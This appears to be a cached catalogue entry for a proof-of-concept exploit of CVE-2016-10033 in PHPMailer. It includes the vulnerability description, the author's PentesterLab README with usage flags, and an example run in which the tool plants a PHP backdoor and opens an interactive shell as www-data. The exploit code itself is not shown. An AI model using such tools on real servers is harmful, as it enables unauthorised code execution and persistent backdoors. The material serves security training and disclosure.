CVE-2016-10033 PoC — PHPMailer 安全漏洞

Source

https://github.com/sealldeveloper/CVE-2016-10033-PoC

Associated Vulnerability

Title:PHPMailer 安全漏洞 (CVE-2016-10033)
Description:PHPMailer是一个用于发送电子邮件的PHP类库。 PHPMailer 5.2.18之前的版本中的isMail transport的‘mailSend’函数存在安全漏洞，该漏洞源于程序没有设置Sender属性。远程攻击者可利用该漏洞向邮件命令中传递额外的参数，并执行任意代码。

Description

A PoC of CVE-2016-10033 I made for PentesterLab

Readme

# CVE-2016-10033-PoC

Wrote this for PentesterLab

> If you are from PentesterLab's don't cheat, it's alot better to learn.

Hope it's useful to someone, if not to me in the future :)

Has interactive shell, nice argparse stuff asw

## Usage
```
usage: poc.py [-h] [--target TARGET] [--backdoor BACKDOOR] [--proxy] [--raw] [--no-color]

options:
  -h, --help           show this help message and exit
  --target TARGET      Target URL
  --backdoor BACKDOOR  Backdoor path
  --proxy              Use local proxy
  --raw                Show raw output
  --no-color           Disable colored output
```

## Example
```bash
$ python3 poc.py --target http://localhost:8000 --proxy
[+] Using random backdoor name: caxvcs009f.php
[+] Sending exploit to target...
[+] Testing backdoor...
[+] Backdoor working! Test output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Starting interactive shell...
[+] Type "exit" to quit
--------------------------------------------------
shell> whoami
www-data
```

File Snapshot


 [4.0K]  /data/pocs/ae9bc2f284f89c4e0ff3641ac54af50d467cadcb
├── [ 34K]  LICENSE
├── [1007]  README.md
├── [  88]  requirements.txt
└── [5.5K]  script.py

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!